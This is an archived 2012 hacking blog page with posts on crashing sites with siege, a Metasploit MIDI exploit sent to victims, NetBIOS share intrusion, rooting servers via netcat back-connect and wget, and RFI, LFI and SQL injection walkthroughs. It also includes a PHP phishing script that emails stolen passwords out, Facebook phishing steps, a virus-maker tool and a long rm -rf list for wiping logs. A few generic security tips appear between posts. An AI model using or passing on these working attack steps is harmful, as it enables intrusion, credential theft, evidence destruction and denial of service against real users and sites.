SEARCH

x

Wednesday 20 June 2012

How to hack a server


THIS TUTORIAL IS ONLY FOR EDUCATIONAL PURPOSES. DO NOT MISUSE IT . DO NOT USE IT AGAINST ANYONE'S SITE OR SERVER. I WILL NOT BE RESPONSIBLE IF SOMETHING GOES WRONG . AGAIN THIS IS ONLY EDUCATIONAL


Requirements :
Any Ubuntu based Linux (ex. Linux mint, Ubuntu, etc etc.)
the first step is to install a program called "siege" this is a command line program. this hack is a pretty small one.
This program is actually used by administrator  to check the strength of their website
which essentially means we can also use it to overload the site and crash it.

The simple steps for installation are
go to your terminal
type in sudo apt-get install siege
type your admin password
it will install
NOW TO ACTUALLY PERFORM THE CRASH..

go to your terminal
type siege -c20 <<website name>>  (example:  siege -c20 www.example.com)
press enter
it will start the "battle"
to stop the attack close the terminal ot press "ctrl+z"
here  "-c" indicates how many concurrent users.. meaning how strong the attack should be.! (this depends on your computers processor (if you have single core then 200 is max, if you have a more powerful comp, then 5000,10000 etc etc)


Note: this hack may or may not work. powerful servers like Google or yahoo cannot be brought down with a single computer. keep this in mind this hack can be super powerful if you want!

Tuesday 19 June 2012

Hack Remote XP using Heap Overflow Attack


4 Hack Remote XP using Heap Overflow Attack
This module exploits heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files. Remote code execution can be achieved by using the Windows Media Player ActiveX control. Exploitation is done by supplying a specially crafted MIDI file with specific events, causing the offset calculation being higher than what is available on the heap (0×400 allocated by WINMM!winmmAlloc), and then allowing us to either “inc al” or “dec al” a byte. This can be used to corrupt an array (CImplAry) we setup, and force the browser to confuse types from tagVARIANT objects, which leverages remote code execution under the context of the user. Note: At this time, for IE 8 target, you may either choose the JRE ROP, or the msvcrt ROP to bypass DEP (Data Execution Prevention). Also, based on our testing, the vulnerability does not seem to trigger when the victim machine is operated via rdesktop.

Exploit Targets
Windows XP service pack 2

Windows XP service pack 3

Requirement
Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole



Now type use exploit/windows/browser/ms12_004_midi

Msf exploit (ms12_004_midi)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms12_004_midi)>set lhost 192.168.1.4 (IP of Local Host)

Msf exploit (ms12_004_midi)>set lport 4444 (Port of Local PC)

Msf exploit (ms12_004_midi)>set srvhost 192.168.1.4 (This must be an address on the local machine)

Msf exploit (ms12_004_midi)>set srvport 80 (The local port to listen on default: 8080)

Msf exploit (ms12_004_midi)>set uripath salesreport (The Url to use for this exploit)

Msf exploit (ms12_004_midi)>exploit



Now an URL you should give to your victim http://192.168.1.4:80/salesreport



Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“


WebSploit Toolkit



WebSploit Is An Open Source Project For Scan And Analysis Remote System From Vulnerability

-> Autopwn - Used From Metasploit For Scan and Exploit Target Service
-> wmap - Scan,Crawler Target Used From Metasploit wmap plugin
-> format infector - inject reverse & bind payload into file format
-> phpmyadmin - Search Target phpmyadmin login page
-> lfi - Scan,Bypass local file inclusion Vulnerability & can be bypass some WAF
-> apache users - search server username directory (if use from apache webserver)
-> Dir Bruter - brute target directory with wordlist
-> admin finder - search admin & login page of target
-> MLITM Attack - Man Left In The Middle, XSS Phishing Attacks
-> MITM - Man In The Middle Attack
-> Java Applet Attack - Java Signed Applet Attack
-> MFOD Attack Vector - Middle Finger Of Doom Attack Vector
-> USB Infection Attack - Create Executable Backdoor For Infect USB For Windows

We have not test it yet, please write your experience with it.

DOWNLOAD

Learn About Trojans and Backdoors


A Trojan horse is an unauthorized program contained within a legitimate program. This unauthorized program performs functions unknown (and probably unwanted) by the user.

It is a legitimate program that has been altered by the placement of unauthorized code within it; this code performs functions unknown (and probably unwanted) by the user.
Any program that appears to perform a desirable and necessary function but that (because of unauthorized code within it that is unknown to the user) performs functions unknown (and definitely unwanted) by the user.
Working of Trojans

 

Attacker gets access to the trojaned system as the system goes online
By way of the access provided by the trojan attacker can stage attacks of different types.
Various Trojan Types

Remote Access Trojans
Password Sending Trojans
Keyloggers
Destructive
Denial Of Service (DoS) Attack Trojans
Proxy/Wingate Trojans
FTP Trojans
Software Detection Killers
Modes of Transmission

Attachments
Physical Access
Browser And E-mail Software Bugs
NetBIOS (File Sharing)
Fake Programs
Un-trusted Sites And Freeware Software
Backdoor Countermeasures

Most commercial ant-virus products can automatically scan and detect backdoor programs before they can cause damage (Eg. before accessing a floppy, running exe or downloading mail)
An inexpensive tool called Cleaner (http://www.moosoft.com/cleanet.html) can identify and eradicate 1000 types of backdoor programs and trojans.
Educate your users not to install applications downloaded from the internet and e-mail attachments.

10 Tips for a Total Online Security



With the sudden rise in the Internet usage across the globe over the past few years, there has also been a rise in the amount of online scams and frauds. Today most of the Internet users are unaware of the most prevailing online threats which pose a real challenge for their safe Internet usage. As a result, Online Security has become a questionable factor for the most Internet users. However it is still possible to effectively combat online insecurity provided that the users are well aware of the common scams and frauds and know how to protect themselves. A study shows that over 91% of the Internet users are unaware of the online scams and are worried about their security. Well if you are one among those 91% then here is a list of 10 tips to ensure your total online security.


1. Always install a good antivirus software and keep it up-to-date. Also install a good anti-spyware to keep your PC away from spywares. Click Here for a list of recommended anti-spyware softwares.


2. Always visit known and trusted websites. If you are about to visit an unknown website, ensure that you do not click on suspectable links and banners.


3. Perform a virus scan on the files/email attachments that you download before executing them.


4. Regularly Update your operating system and browser software. For a better security it is recommended that you surf the Internet through the latest version of your browser program.


5. Never share your password (email, bank logins etc.) with any one for any reason. Choose a strong password (A blend of alphanumeric+special symbols) and change it regularly, eg. every 3 months. Avoid using easy-to-guess passwords. (ex. pet’s name or kid’s name)


6. Always type the URL of the website in your browser’s address bar to enter the login pages. For ex. To login to your Gmail account type http://mail.google.com


7. Before you enter your password on any login page, ensure that you see https instead of http. ex. https://mail.google.com instead of http://mail.google.com. HTTPS protocol implements SSL (Secure Sockets Layer) and provide better security than a normal HTTP. For more information on HTTPS and SSL see Know More About Secure Sockets Layer (SSL).


8. Beware of phishing emails! Do not respond to any email that request you to update your login details by clicking on a link in the body of the email. Such links can lead to Fake Login Pages (Spoofed Pages). For more information on phishing refer What is Phishing?. Also refer How to Protect an Email Account from being Hacked.


9. Always hit the logout button to close your login session rather than abruptly terminating the browser window. Also clear your web browser caches after every session to remove the temporary files stored in the memory and hard disk of your PC.


10. Avoid (Stop) using any public computers or computers in the Internet cafes to access any sensitive/confidential information. Also avoid such computers to login to your email/bank accounts. You cannot be sure if any spyware, keystroke-logger, password-sniffer and other malicious programs have not been installed on such a PC.

Netbios Hacking



THIS NETBIOS HACKING GUIDE WILL TELL YOU ABOUT HACKING REMOTE COMPUTER AND GAINING ACCESS TO IT’S HARD-DISK OR PRINTER. NETBIOS HACK IS THE EASIEST WAY TO BREAK INTO A REMOTE COMPUTER.

STEP-BY-STEP NETBIOS HACKING PROCEDURE

1.Open command prompt

2. In the command prompt use the “net view” command
( OR YOU CAN ALSO USE “NB Scanner” OPTION IN “IP TOOLS” SOFTWARE BY ENTERING RANGE OF IP ADDRESSS. BY THIS METHOD YOU CAN SCAN NUMBER OF COMPUTERS AT A TIME).

Example: C:\>net view \\219.64.55.112

The above is an example for operation using command prompt. “net view” is one of the netbios command to view the shared resources of the remote computer. Here “219.64.55.112″ is an IP address of remote computer that is to be hacked through Netbios. You have to substitute a vlaid IP address in it’s place. If succeeded a list of HARD-DISK DRIVES & PRINTERS are shown. If not an error message is displayed. So repeat the procedure 2 with a different IP address.

3. After succeeding, use the “net use” command in the command prompt. The “net use” is another netbios command which makes it possible to hack remote drives or printers.

Example-1:
C:\>net use D: \\219.64.55.112\F
Example-2:
C:\>net use G: \\219.64.55.112\SharedDocs
Example-3:
C:\>net use I: \\219.64.55.112\Myprint

NOTE: In Examples 1,2 & 3, D:,G: & I: are the Network Drive Names that are to be created on your computer to access remote computer’s hard-disk.

NOTE: GIVE DRIVE NAMES THAT ARE NOT USED BY ANY OTHER DRIVES INCLUDING HARD-DISK DRIVES, FLOPPY DRIVES AND ROM-DRIVES ON YOUR COMPUTER. THAT IS, IF YOU HAVE C: & D: AS HARD DIRVES, A: AS FLOPPY DIVE AND E: AS CD-DRIVE, GIVE F: AS YOUR SHARED DRIVE IN THE COMMAND PROMPT

F:,”SharedDocs” are the names of remote computer’s hard-disk’s drives that you want to hack. “Myprint” is the name of remote computer’s printer. These are displayed after giving “net use” command. “219.64.55.112″ is the IP address of remote computer that you want to hack.

4. After succeeding your computer will give a message that “The command completed successfully“. Once you get the above message you are only one step away from hacking the computer.

Now open “My Computer” you will see a new “Hard-Disk drive”(Shared) with the specified name. You can open it and access remote computer’s Hard-Drive. You can copy files, music, folders etc. from victim’s hard-drive. You can delete/modify data on victim’s hard-drive only if WRITE-ACCESS is enabled on victim’s system. You can access files/folders quickly through “Command Prompt”.

NOTE: If Remote Computer’s Firewall Is Enabled Your Computer Will Not Succeed In Gaining Access To Remote Computer Through Netbios. That is Netbios Hacking Is Not Possible In This Situation.(An Error Message Is Displayed). So Repeat The Procedure 2,3 With Different IP Address.

Hack Linux root password



When booting the workstation, the bootloader GRUB allows you time for selecting your operating system. On that screen, follow the following steps:

1 – Highlight/select the distro (Red Hat Linux) using the arrow keys.

2 – Press ‘e’ to edit the boot parameters for the distro.

3 – You will see some entries like the following ones:

root (hd0,0)
kernel /vmlinuz-2.4.20-8 ro root=LABEL=/
initrd /initrd-2.4.20-8.img

3 – Highlight/select the line for the Kernel parameters. In the above example, it is the second line which is in bold. Press ‘e’ when you have selected it.

4 – Add ‘single at the end of the line. Don’t forget to put a space between the last character and ‘single’ or ’1′. Example:

kernel /vmlinuz-2.4.20-8 ro root=LABEL=/ single

5 – Press ‘Enter’ or ‘Return’ key for saving the changes and then ‘b’ for booting.

6 – Once the system boots and you arrive at the command line interface, use the passwd command to change the root password as below:

passwd root

7 – Follow the instructions to enter new password twice.

8 – Once done, type ‘reboot’ or ‘exit’ to boot again. The new password you set will now work.

Monday 18 June 2012

TOR - anonymous Internet communication system


Tor is a toolset for a wide range of organizations and people that want to improve their safety and security on the Internet. Using Tor can help you anonymize Web browsing and publishing, instant messaging, IRC, and SSH. Tor also provides a platform on which software developers can build new applications with built-in anonymity, safety, and privacy features.

DOWNLOAD

CyberGhost VPN ( Virtual Private Network)


The Internet has long since become an interactive means of communication. Everyone writes e-mails, and many are making use of online storage sites, blogging, or sharing their views on Web forums. Fortunately, CyberGhost VPN gives users a way to surf anonymously and keep their private information from the eyes of others. CyberGhost VPN provides you with anonymous IP address and encrypts transmissions between you and the Web.

DOWNLOAD

SERVER ROOTING TUTORIAL



Things Required :

Netcat
Shelled site
Local root exploit

First go to Run & type cmd then type : cd C:\Program Files\Netcat  ( Make sure that you Netcat is saved in the following directory )

Now Type : nc -n -l -v -p 443

Its time to open your shell & then connect  using back connect function in your shell ( Make sure that you are not using any Vpn or Proxy )

So you have successfully connected. Then now we have to get our Local Root Exploit, example:  2.6.18-374 2011


In this step we have to upload our exploit in a writable folder, so instead of wasting our time in finding them we can just change the directory to the /tmp folder which is a standard writable folder .
Type this command to change dir to /tmp : cd /tmp
To upload your your exploit we will use wget function .
Type : wget http://www.somesite.com/exploit.c

Now this will upload the exploit in the tmp folder .


(Case 1) if you have uploaded your exploit as .c (exploit.c) the we have to compile it, so to compile it we will type the following command .
Type : gcc exploit.c -o exploit

Keep in mind in the above command exploit refers to the name of your exploit (exploit.c) .so if its properly compiled with no errors & warning then you can proceed or if you get an error then find another exploit.

(Case 2) If you have uploaded your exploit in a zip file then you have to unzip it by typing the below command .

Type: unzip exploit.zip

After we have done all the above steps correctly, its time to give permission so we will type the following  command
Type: chmod 777 exploit
Now  its time to run the Exploit, to run the exploit we will type the following command
Type: ./exploit

Now the exploit will run & the server will be rooted.  To check weather we got root we can type

Type: id or whoami


Clearing Logs:

Now its our time to clearing our tracks or Logs . so below are some commands to delete the log files .

rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
history -c
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;

Exploits can be uploaded manually too and We can use open port according to our choice



We can root the server in two ways..
By using
1. exploits
2. buffer overflow
so first of all introduction abt local exploits..
There are two types local exploits
1. In the form of local
2. In the form of local.c
the diff bet both is that both exploit compilation is diff
advantage of 1st exploit is that we can compile this exploit directly..
Bt in second exploit 1st converted into simple n general form from local.c to local using following command in perl
gcc local.c -o local

RFI ( Remote File Inclusion ) Tutorial



What is RFI?
Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file, but depending on the severity, to list a few it can lead to:

Code execution on the web server
Code execution on the client-side such as JavaScript which can lead to other attacks such as cross site scripting (XSS).
Denial of Service (DoS)
Data Theft/Manipulation
RFI is a very uncommon vulnerability due to excessive patches and updates on websites.

What makes a page vulnerable?
A PHP include script looks like this.
Code:
include($_GET['p']
?>
Since the code uses 'p' the syntax would be:
Code:
http://victimsite.com/index.php?[b]p[/b]=URL_TO_SHELL.txt?
If the script looks like this:
Code:
include($_GET['lulz']);
?>
The syntax would then be:
Code:
http://victimsite.com/index.php?lulz=URL_TO_SHELL.txt?

What can I accomplish with RFI?
You can include your PHP shells onto the website (GNYShell, C99, etc).
You can include just about any file onto the website.

How can I search for RFI vulnerable sites?
Well, first, we need to obtain a website with a vulnerability. If you are to lazy to look around here is a google dork you can use to find a vulnerable site:
Also you can use exploit scanners for find RFI Vulnerable site.

Here is a list of some RFI dorks:
inurl:"index.php?page=contact.php"
inurl:"template.php?goto="
inurl:"video.php?content="
inurl:"pages.php?page="
inurl:"index1.php?choix="
For More Dorks Click Here To Download RFI Dork List File
We've got our target, how do we exploit this vulnerability?
Testing the vulnerability is basically exploiting the vulnerability. So we will be testing as well as finishing up.
What you have to do is go to your vulnerable website. In this case I will be making a website up for demonstration.
Code:
http://victimsite.com/index.php?p=interview.php
As you can see above there is a file attached to the index.php file. In this case it is "interview.php". Most of the time there will have to be a file at the end of the URL, just like this one. Since we're including a file there has to be something to replace it with.

Tweaking and exploiting :
What you will need.
You will need to upload your shell in .txt format (shell.txt) instead of .php format (shell.php). I recommend you use c99, r57, Locus, etc.
You will need to upload it to any website hosting.
So once you have uploaded your shell to your website, it should look like this.

Code:
http://yoursite.com/shell.txt
Including our shell to our slave's website.
Okay, once we are at the vulnerable page (http://victimsite.com/index.php?p=include.php) we want to replace "include.php" and include our own file.
Our new link should look like this.
Code:
http://victimsite.com/index.php?p=http://yoursite.com/shell.txt?
Note : The question mark (?) is important. If the site was vulnerable you should now see your shell embedded to the webpage. You can then do as you wish with it. Sometimes "shell.txt?" may not be enough, we may need to use null bytes for it to execute successfully. If you receive an error from "shell.txt?" try "shell.txt?".

What this will do is go under the site as a php format. Because if you look closly at index.PHP, you can see that php is the format, so when we tell the website we want to go to: http://yoursite.com/shell.txt it will mistake it as a php file and retrieve us the data.

Once you got your shell on, you can do many things. You can find config.php to get access to mysql, you can get root, etc.

But, we will be focusing on gaining root.

We will need to back connect, to be able to do this, you need to meet two requirements:
Port forward the port you want to connect to.
You will need netcat
Since most shells are sort of screwed on the back connecting part, you can use bc.pl to do a nice back connect.

Back Connect:
Code:
http://pastie.org/396949
Some shells however don't, such as: Locus7Shell, Storm7Shell, GnY shell and some more...

Save as bc.pl then you will need to execute the perl script (bc.pl) to the server itself.

If you want to do this via back connection on shell, then open netcat, type in:
Code:
nc -l -n v- p PORT
You need to insert the port you forwarded, for example:
Code:
nc -l -n -v -p 1337

Press enter, and then it will start listening to the port then go back to the shell and submit the back connection
then once you go back to netcat your ready.

Type:
Code:
whoami

As you can see you do not have root.

Now we need to type uname -a to find out what type of linux box they are running.

It may look something like this:
Code:
Linux linux1.dmehosting.com 2.6.17-92.1.10.el5PAE #1 SMP Tue Aug 5 08:14:05 EDT 2008 i686
Now look, 2.6.17 is vuln to vmsplice :)

We can add our local root exploit two ways, we can do it via netcat, or we can do it via shell.

now we need to compile it, we can use gcc (compiling command) to do this. Here is how it will look like:
Code:
gcc 5092 -o exploit
What that does is compile 5092 (our Local Root Exploit) and uses -o (which means to open it via exploit)

Or we can do this via shell:

Find your Local Root Exploit for this box, save it as .c go to your shell and upload it.

After uploaded go back to netcat and type in:

Code:
gcc localrootexploit.c -o getr00t
change localrootexploit.c to your exploits name and leave getr00t as what it is named.

Now press enter.

Method #1 (execute Local Root Exploit)
./exploit

Method #2 (execute Local Root Exploit)
./getr00t

Now type in:

Code:
whoami
And if root appears you have successfully rooted this box.

Part 2

If this box you owned is running a Windows NT box or something familiar, we can "Install a Trojan" on them.

To do this you should see a tab somewhere in the shell where it say says "Backdoor host" or something familiar. If not, try a better shell.

Choose a Trojan you like, from my experience I use:
beast v2.07

Install it then it says its ready. Install beast v2.07 client then insert the IP and port it gave you. Then connect.

You need to remember that some Windows Boxes have firewall protection, but since this is winblows there is usually a backup of the desktop and C:\ meaning you can find the firewall and delete a needed file and then it won't execute correctly then, you got yourself some win.
This is exactly why you never run a Windows box on your server.
If you like you can crash this box using a winpopup message. This is easy to do from unix using smbclient -U Lotsofshit -M host.

LFI ( Local File Inclusion ) Tutorial



REQUIREMENTS:

1) Site vulnerable to LFI
2) Remote shell ( http://www.yourhosting/urshell.txt)
3) User-Agent switcher ( https://addons.mozilla.org/en-US/firefox...-switcher/)
4) Mozilla Firefox Browser

First of all see if your site is vulnerable to LFI (I'm not going to explain how to find it or exploit it)
Try to open etc/passwd
Example: http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../etc/passwd
Ok fine...We can open etc/passwd
Now type proc/self/environ

Example:
http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../proc/self/environ

First of all see if your site is vulnerable to LFI (I'm not going to explain how to find it or exploit it)
Try to open etc/passwd
Example: http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../etc/passwd
Ok fine...We can open etc/passwd
Now type proc/self/environ

Example:
http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../proc/self/environ


Now download and install User-Agent switcher.
Go to Tools > Default User-Agent > Edit User Agents

Now make new user-agentGo to New > New User-Agent

Now leave everything as it is exept description and user-agent.
In description enter name of it (Mine is phpinfo)
In User-Agent paste this in there.
Select your User-Agent in Tools > Default User Agent > PHP Info (Or whatever you User Agent is called)

Go to your site and refresh it.

Now search for "disable_functions" (Ctrl+F Search function)

Now go back and edit your User-Agent.
Change "User-Agent" to:

(What this function do?. It downloads shell in .txt format and renames it as shell.php)

Save it and refresh your site.

Go to http://www.LFISITE.com/shell.php

How to "Delete administrator Password" without any software



Method 1

Boot up with DOS and delete the sam.exe and sam.log files from Windows\system32\config in your hard drive. Now when you boot up in NT the password on your built-in administrator account which will be blank (i.e No password). This solution works only if your hard drive is FAT kind.

Method 2

Step 1. Put your hard disk of your computer in any other pc .
Step 2. Boot that computer and use your hard disk as a secondary hard disk (Don't boot as primary hard disk ).
Step 3. Then open that drive in which the victim’s window(or your window) is installed.
Step 4. Go to location windows->system32->config
Step 5. And delete ADMINNAME.exe and ADMINNAME.log
Step 6. Now remove hard disk and put in your computer.
Step 7. And boot your computer

Create Virus Using JPS (Virus Maker)


This is a small but very useful software . With the help of this you can create any type of trojans and program it to do whatever you want.

This can be programmed to do the following things:

Disable Registry Editor
Disable Ms Config
Disable Task Manager
Disable Yahoo! Messenger
Disable Media Player
Disable Internet Explorer
Disable Time
Disable Group Policy
Disable Windows Explorer
Disable Norton Antivirus
Disable McAfee Antivirus
Disable Note Pad
Disable Word Pad
Disable Winows
Disable DHCP Client Service
Disable Taskbar
Disable Start Button
Disable MSN Messenger
Disable Command Prompt
Disable Security Center
Disable MSN Messenger
Disable System Restore
Disable Control Panel
Disable Desktop Icons
Disable Screen Saver
Hide Service Manager
Hide Outlook Express
Hide Windows Clock
Hide Desktop Icons
Hide All Process in Task Manager
Hide All Tasks in Task Manager
Hide Run in Start Menu
Change Explorer Caption
Clear Windows XP Password
Swap Mouse Buttons
Remove Folder Options
Lock Mouse & Keyboards
Mute Sound
Crazy Mouse
Allways CD-ROM Open
Turn Off Monitor (30 sec's)
Destroy Taskbar
Destroy Offlines (Y!Messenger)
Destroy Protected Strorage
Destroy Audio Service
Destroy Clipboard
Terminate Windows
Hide Cursor
Auto Startup
Restart-Logoff-Turnoff-Hibrinate Automatic After 30 minutes
Change Server Name After Install in Process
Change Server Name
Change XP Password
Change Computer Name
Change IE Home Page
Close Custom Windows
Disable Custom Service
Disable Process
Open Custom Website
Run Custom Command
Enable Convert To Worm - Auto Copy Server To Active Path With Custom Name & Time
Change Custom Icon For your created Virus (15 Icons)


NOTE
THIS IS A VIRUS MAKING SOFTWARE SO SOME ANTIVIRUS MAY DETECT IS AS A VIRUS BUT ACTUALLY IT IS NOT A VIRUS. SO DON'T WORRY

CAUTION
DON'T TRY TO OPEN THE CREATED VIRUS ON YOUR OWN PC


DOWNLOAD

How to Make a Phisher to Hack Any E-Mail Account Password



Making a phisher is very simple. You don’t have to know anything about coding. Just follow me as mentioned in below steps:

1. First of all go to the website you want to copy, and locate the login page.

2. Right click, and click on Source. Highlight all and copy onto a text document.

3. Go into the source and search for <form (Ctrl + F and search the code), when you find it look along the tag and find action=" and inside it there will be a URL, delete that url and type in login.php

4. Now you need to find where the textboxes are. To do this find a label next to one of the inputs, eg 'E-mail address:' Then go into the source and search for 'E-mail address:' then follow it along until you see <input name= "login"

5. Now open up notepad and post the following code, and then follow instuctions after the //

//replace login with the input of email. (Email form)
$log_email = $HTTP_POST_VARS['login'];
$Password = $HTTP_POST_VARS['password'];
//Put your email here
$to = 'ozsanchez@hotmail.co.uk';
//Put what you want the subject to be
$subject = 'New password found, $log_email's email.';
//define the message to be sent. Each line should be separated with \n
$message = "E-mail: $log_email\n\nPassword: $Password";
//define the headers we want passed. (who the email is from). Note that they are separated with \r\n
$headers = "From: ozsanchez@hotmail.co.uk";
//send the email
$mail_sent = @mail( $to, $subject, $message, $headers );
//redirect asap to offical website.
header('Location: https://login.live.com/ppsecure/post.srf?id=66262');
?>

6. Save it as login.php

7. Upload both files onto your website or to a free-hosting site like:

www.yourfreehosting.net
www.drivehq.com
www.110mb.com
www.t35.com
www.esmartstart.com
Good trick to make link longer is to put '?' after any page and put anything after it.

You can get someones ip address by if you put at the top of the login.php file this code:

$ip_address = $_SERVER['REMOTE_ADDR']

Hack Facebook Password Through Phishing


Phishing is the most commonly used method to hack Facebook. The most widely used technique in phishing is the use of Fake Login Pages, also known as spoofed pages. These fake login pages resemble the original login pages of sites likeYahoo , Gmail, MySpace etc. The victim is fooled to believe the fake facebook page to be the real one and enter his/her password. But once the user attempts to login through these pages, his/her facebook login details are stolen away. I recommend the use of Phishing to hack facebook account since it is the easiest one.

1. First of all download Facebook Phisher 

2. The downloaded file contains:

Index.html
write.php

3. Upload both files to any of these free webhost sites:

www.yourfreehosting.net
www.freehosting.com
www.x10hosting.com
www.drivehq.com
www.110mb.com
www.t35.com
www.esmartstart.com

4. Now, send this phisher link (index.html link) to your victim and make him login to his Facebook account using your sent Phisher.

5. Once he logs in to his Facebook account using Phisher, all his typed Facebook id and password is stored in "passes.txt". This file is created in your webhost control panel

If you dont get passes.txt, try refreshing your page.Once you get passes.txt, you get Facebook password and can easily use it for hacking Facebook account.

6. Now, open passes.txt to get hacked Facebook id and password


What is Phishing?

This summary is not available. Please click here to view the post.

URL Based SQL Injection



Introduction: SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of SQL Server for parsing and execution.

Finding Sites: When talking to find a vulnerable site for SQL Injection you will hear the term Dork a lot, this refers to a google search term targeted at finding vulnerable websites. An example of a google dork is inurl:index.php?id=, entering this string in google search engine would return all sites from google cache with the string news.php?id= in their URL.
Ex:

http://www.site.com/news.php?id=4

To be a SQL injection vulnerable a site has to have a GET parameter in the URL.
In http://www.site.com/news.php?id=4, id=4 is the GET parameter as it is getting the id=4 from the backend database.

Checking Vulnerability: To check if the site is vulnerable to SQLi the most common way is to just add an apostrophe( ‘ ) after one of the parameter in the URL.
Ex:

http://www.site.com/news.php?id=4′

Now if the site is vulnerable it will show error like:

You have an error in your SQL Syntax

Warning: mysql_num_rows()
Warning: mysql_fetch_assoc()
Warning: mysql_result()
Warning: mysql_fetch_array()
Warning: mysql_numrows()
Warning: mysql_preg_match()

If you see any of these errors when entering ‘ after the number or string of parameter then the chances are the site is vulnerable to SQLi attacks to some extent. Although that is not the only way to know if the site is vulnerable to SQLi attacks, an error can be in form of when a part of the site is just simply disappears such as a news article, body text or images. If this happens then the site is vulnerable also.

Finding number of columns: After you find that the site is vulnerable the next step is to find the number of columns in the table that is in use. There are couple of ways to do this like ORDER BY or GROUP BY. Here I will use ORDER BY To find the number of columns start with ORDER BY 1.

Ex.

http://www.site.com/news.php?id=4 ORDER BY 1–

If it doesn’t error then probably you can use ORDER BY command. Sometimes you will get error on doing ORDER BY 1, if it gives error then simple move on to other site. If it doesn’t error then I always go to ORDER BY 10000 (because a table can’t have 10000 columns in it) to see if it give error.

Ex.
http://www.site.com/news.php?id=4 ORDER BY 10000–

Sometimes it doesn’t error as it should, then I use AND 1=0 before the ORDER BY query to get an error.

Ex.

http://www.site.com/news.php?id=4 AND 1=0 ORDER BY 10000–

After getting the error on 10000 its up to you how you find the number of columns, I start with 100 and divide the no of columns by 2 until i get closer. Something like this:

http://www.site.com/news.php?id=4 ORDER BY 100–
ERROR

http://www.site.com/news.php?id=4 ORDER BY 50–
ERROR

http://www.site.com/news.php?id=4 ORDER BY 25–
ERROR

http://www.site.com/news.php?id=4 ORDER BY 12–
ERROR

http://www.site.com/news.php?id=4 ORDER BY 6–
ERROR

http://www.site.com/news.php?id=4 ORDER BY 3–
NO ERROR

As 6 is giving error and 3 is not the number of columns is either 3, 4 or 5.

http://www.site.com/news.php?id=4 ORDER BY 4–
NO ERROR

http://www.site.com/news.php?id=4 ORDER BY 5–
ERROR

After this you can conclude that the website has 4 columns as it gives error above ORDER BY 4 and doesn’t error below ORDER BY 4.

NOTE: Comments are not necessary every time when injecting a website, although sometimes they are. Possible comments to use are:

/*
/**/
#

Getting MySQL version: This is an important step because if the MySQL version is lower than 5 then we have to guess the name of the tables and columns to inject which is sometimes get frustrating so I would recommend to work on version 5 for beginners. Before finding the version of the column we have to find the visible column number to inject our query to get result. To do this we will use the SELECT statement and UNION ALL statement.

http://www.site.com/news.php?id=4 UNION ALL SELECT 1,2,3,4–

It will return numbers back in data place, if it doesn’t then add a negative sign after the equals sign, put a null in place of the number after the equal sign or add AND 1=0 before the UNION query.

http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,3,4–

http://www.site.com/news.php?id=null UNION ALL SELECT 1,2,3,4–

http://www.site.com/news.php?id=4 AND 1=0 UNION ALL SELECT 1,2,3,4–

Now say we got back the number 3, so this is the column that we can retrieve data from. To get the database version there are two ways either version() or @@version, let’s use them:

http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(version()),4–

http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(@@version),4–

If you get an error like "Illegal mix of coallations when using @@version", then you have to convert it into latin from UTF8 as:

http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(@@version using latin1),4–

NOTE: We are completely replacing the number 3 with our query, something like 1,2,group_concat(@@version),3,4– will result in error.

If it worked you will get the version of MySQL. You will see something like 5.0.45, 5.0.13-log, 4.0.0.1 etc. All we need to focus is on the first number,i.e., 4 or 5. If it is 5 then keep going but if it is 4 and you are new then you should move on to other website because we have to guess the table names in order to extract the data.

NOTE: Sometime you will get frustrated by knowing that you spent 5-10 minutes in just getting the database version after applying the ORDER BY, UNION SELECT and version() in queries and the result is MySQL4. So to save my time in getting the database version, I use the Inferential(Blind SQL Injection) to get the version of the MySQL. Do as follows:

http://www.site.com/news.php?id=4 AND 1=1–
NO ERROR

http://www.site.com/news.php?id=4 AND 1=2–
ERROR

http://www.site.com/news.php?id=4 AND substring(@@version,1,1)=4–
If page come back true then the version is 4.

http://www.site.com/news.php?id=4 AND substring(@@version,1,1)=5–
If page come back true then the version is 5.

If version is 5 then you can start ORDER BY and continue because you already know that the version is 5 and you will not have to guess the table names. Although I would recommend that beginners should use ORDER BY.

GETTING NAME OF DATABASES: Getting databases name is very important because sometimes the current database the webpage is running does not contains useful informations such as username and passwords. So it is good to have a look at all the databases. In MySQL version 5 or higher there is always a database named ‘information_schema’ which make SQL injection easier. To get the list of the databases use this:

http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(schema_name),4 from information_schema.schemata–

now you will get the name of all the databases at the same position where you saw the version of MySQL before.
Ex: information_schema,db_site,db_main

To know which database you are working upon use database() in the query as:

http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(database()),4–

Now you will get the current database. Ex: db_site

To know the current user of database use user(), although its not necessary but its good to know.

http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,group_concat(user()),4–

Now you should get the current user of database. Ex: user@localhost.

To save your time you can use a query to display version, current database and user all at once as:

